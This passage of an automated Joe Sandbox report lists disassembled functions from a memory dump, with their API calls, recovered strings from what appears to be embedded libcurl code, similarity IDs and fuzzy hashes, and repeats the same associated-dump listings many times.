                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fwritestrlen
                                                                                                                                                                                                                                                            • String ID: ...$...
                                                                                                                                                                                                                                                            • API String ID: 735340043-2253869979
                                                                                                                                                                                                                                                            • Opcode ID: 6f738b1b25ea84771e220c172e0823021b0d78c3efd1d79fdd011aa983bddf34
                                                                                                                                                                                                                                                            • Instruction ID: f1613aa3d795f987734f49704f85a616d914bf377bcc198e1b17e1ae6530bc2c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f738b1b25ea84771e220c172e0823021b0d78c3efd1d79fdd011aa983bddf34
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 262151B2E547007AD63466209C87FE7765CBF50709F040429F588151C3FAB651B48BF7
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00251909
                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 0025193C
                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00251943
                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 0025194D
                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00251954
                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00251960
                                                                                                                                                                                                                                                            • VerifyVersionInfoA.KERNEL32(?,00000033,00000000), ref: 0025196D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 375572348-0
                                                                                                                                                                                                                                                            • Opcode ID: 585aa156747b5602a13ec2bba20f6fa0ce8cba46789a15cc1c236952ce55a0e3
                                                                                                                                                                                                                                                            • Instruction ID: 721798465fd39e388b3c897f40f89b98b43d82aad26855ff7b2d6f613cec056e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 585aa156747b5602a13ec2bba20f6fa0ce8cba46789a15cc1c236952ce55a0e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C01104B5A403447BF2306B319C19F7B7BACEFC5B44F05481CFA88AB2C1D276A8188765
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strrchr$_strdupfreestrstr
                                                                                                                                                                                                                                                            • String ID: ://
                                                                                                                                                                                                                                                            • API String ID: 1310700620-1869659232
                                                                                                                                                                                                                                                            • Opcode ID: 30465ca61eab870739bd27c8e68e6d93a3566ffe133cf80268c0c258d70beda6
                                                                                                                                                                                                                                                            • Instruction ID: f11bcf352af570652ddb638a92ddbf00201698018bea454a63481d40445e9975
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30465ca61eab870739bd27c8e68e6d93a3566ffe133cf80268c0c258d70beda6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF1106F1F102125BEF156A259C02B6BBB988F54710F09057AFC05D7381F729DD2886E2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(APPDATA,?,00000400), ref: 0023975C
                                                                                                                                                                                                                                                            • strchr.MSVCRT ref: 00239775
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(APPDATA,?,00000400), ref: 0023978A
                                                                                                                                                                                                                                                            • strchr.MSVCRT ref: 0023979B
                                                                                                                                                                                                                                                            • _strdup.MSVCRT(?), ref: 002397BF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environmentstrchr$ExpandStringsVariable_strdup
                                                                                                                                                                                                                                                            • String ID: APPDATA
                                                                                                                                                                                                                                                            • API String ID: 69599419-4054820676
                                                                                                                                                                                                                                                            • Opcode ID: dc4a9b69c2e6af4bda7e773bce26af2bbd31b040e9e121c2b927f3521bb9e946
                                                                                                                                                                                                                                                            • Instruction ID: c8035c5198162b151302eb8e63f20418bf9962110aa026c826aaa860920a04b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc4a9b69c2e6af4bda7e773bce26af2bbd31b040e9e121c2b927f3521bb9e946
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71012DF2F702461BFB253D395C497FAB04CC742355F04003AFE0AA61C1F5998CA846A5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: puts$printf
                                                                                                                                                                                                                                                            • String ID: %s$ <none>$Build-time engines:
                                                                                                                                                                                                                                                            • API String ID: 1383214260-2903797034
                                                                                                                                                                                                                                                            • Opcode ID: 78881ee88b855c49d8f240574f05d5e46b31fd72552cbbb01abb1f7bef7adcf0
                                                                                                                                                                                                                                                            • Instruction ID: b2d4e5f38c4b20b1252411fc7653eb270f336a158225f2cfcac56f49e79d9e3e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78881ee88b855c49d8f240574f05d5e46b31fd72552cbbb01abb1f7bef7adcf0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF0B4F4E142019BDA48BB14EC02F1AB6D45F54304F04086EF484C7351F6A9E8A4C667
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • failed to duplicate handle, xrefs: 0024F552
                                                                                                                                                                                                                                                            • failed to set user_data for stream %d, xrefs: 0024F6AE
                                                                                                                                                                                                                                                            • Internal NULL stream!, xrefs: 0024F562
                                                                                                                                                                                                                                                            • failed to add handle to multi, xrefs: 0024F5FB
                                                                                                                                                                                                                                                            • Connection state changed (MAX_CONCURRENT_STREAMS == %u)!, xrefs: 0024F259
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                            • String ID: Connection state changed (MAX_CONCURRENT_STREAMS == %u)!$Internal NULL stream!$failed to add handle to multi$failed to duplicate handle$failed to set user_data for stream %d
                                                                                                                                                                                                                                                            • API String ID: 3510742995-3583929766
                                                                                                                                                                                                                                                            • Opcode ID: 62d3873085f93b32aff73e56f52ecb23064b800aec5c49009e8a98f649b94a19
                                                                                                                                                                                                                                                            • Instruction ID: f623f76b442e054c87237c749933bf1f92119f89ce4841e3dcc4317b018a6f29
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62d3873085f93b32aff73e56f52ecb23064b800aec5c49009e8a98f649b94a19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45D1DFB09107019BE728EF24DD85BEB77E4AF84314F084678EC1D4B292E775A960CF91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$memcpystrchr
                                                                                                                                                                                                                                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                                                                                                                                                            • API String ID: 2999326979-3030351490
                                                                                                                                                                                                                                                            • Opcode ID: 6b1c86dfb2bd24ca64fb77285108e6f424bfc5617cdbe60cfca30b1709be99e3
                                                                                                                                                                                                                                                            • Instruction ID: e33be36cdfb14ac22aad8de37b25c33e1d30765eef86ce35925092ed97580720
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b1c86dfb2bd24ca64fb77285108e6f424bfc5617cdbe60cfca30b1709be99e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A81F474925301AFEB11AF10EC49B5B77E5AF50308F444439FD498B2A2FB72D928CB96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcmp.MSVCRT(:status,?,00000007), ref: 0024FA69
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcmp
                                                                                                                                                                                                                                                            • String ID: $%s:%s$:status$HTTP/2 $Internal NULL stream! 5
                                                                                                                                                                                                                                                            • API String ID: 1475443563-2461269821
                                                                                                                                                                                                                                                            • Opcode ID: 6c6987c97dd723db7bd898a99f509242822d43f460b51ba673168971be20e9e9
                                                                                                                                                                                                                                                            • Instruction ID: d941cc58385e06eb95b858bcb5af3f59781883007a85ac8e4587f1cca27afbfc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c6987c97dd723db7bd898a99f509242822d43f460b51ba673168971be20e9e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F97158719203517BEB54AE20ED81F5A37A9AB91758F5C027AFC085A3C3F3B5D9308B52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchrstrlen$strstr
                                                                                                                                                                                                                                                            • String ID: %%%02x
                                                                                                                                                                                                                                                            • API String ID: 2740638095-4020994737
                                                                                                                                                                                                                                                            • Opcode ID: d2285917f36f198fdb66207f9ed2f049a9878ea33d8082f19cb5b958e84cc404
                                                                                                                                                                                                                                                            • Instruction ID: 8b465be7924dabdfdd6f7ffdbb1274fe22b7a33a9b7de3b485aa550ae189af1f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2285917f36f198fdb66207f9ed2f049a9878ea33d8082f19cb5b958e84cc404
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA317AAAC253125BEB213E295C4133776D84F62308F0D006AFC854A2C3F6699CB583BB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0027CD00: getaddrinfo.WS2_32(?,?,?), ref: 0027CD23
                                                                                                                                                                                                                                                              • Part of subcall function 0027CD00: freeaddrinfo.WS2_32(?,?,?,?), ref: 0027CE62
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 0024DC9C
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 0024DCA6
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0024DCBD
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0024DCCF
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000), ref: 0024DCDC
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0024DD86
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$ErrorLastLeave$DeleteEnterfreeaddrinfogetaddrinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2133702940-0
                                                                                                                                                                                                                                                            • Opcode ID: 77efafdccf1ec93f6d086a7471423481196108bed8c066875a30eb918635f2b3
                                                                                                                                                                                                                                                            • Instruction ID: 093c6428811c28f60ce83d24b8373cd645cfeedf854a960677e70de332405a74
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77efafdccf1ec93f6d086a7471423481196108bed8c066875a30eb918635f2b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4314CB1501A02EFE7109F25DD5CB42BBB4FF04318F144229E81996A91E7BAE878CFD5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                            • String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                                                                                                                                                                                                                                            • API String ID: 1294909896-250881521
                                                                                                                                                                                                                                                            • Opcode ID: 8714f428a871ed0d753cd393766d87a3d8f1c87776682bd439002fd2368d93ee
                                                                                                                                                                                                                                                            • Instruction ID: dc5e177b527f5c69d0d5a82880c54c74b280300e235205cf5e33566ad6c3a128
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8714f428a871ed0d753cd393766d87a3d8f1c87776682bd439002fd2368d93ee
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC110AE16103465F9714BAA41CD2A27728D9F54344F20003AFE4CD2242FAB5CEF047A5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00249A20: memchr.MSVCRT ref: 00249A7D
                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(00000000), ref: 0024DA8F
                                                                                                                                                                                                                                                              • Part of subcall function 0024A740: socket.WS2_32(00000017,00000002,00000000), ref: 0024A751
                                                                                                                                                                                                                                                            • _errno.MSVCRT ref: 0024DBF5
                                                                                                                                                                                                                                                              • Part of subcall function 00267140: strlen.MSVCRT ref: 0026718C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • getaddrinfo() thread failed to start, xrefs: 0024DBFD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalInitializeSection_errnomemchrsocketstrlen
                                                                                                                                                                                                                                                            • String ID: getaddrinfo() thread failed to start
                                                                                                                                                                                                                                                            • API String ID: 812987948-737161664
                                                                                                                                                                                                                                                            • Opcode ID: a4d38e11eb2932ca2d7895d38621203d6848b9f5461c503c0227dc2ca8abdf3a
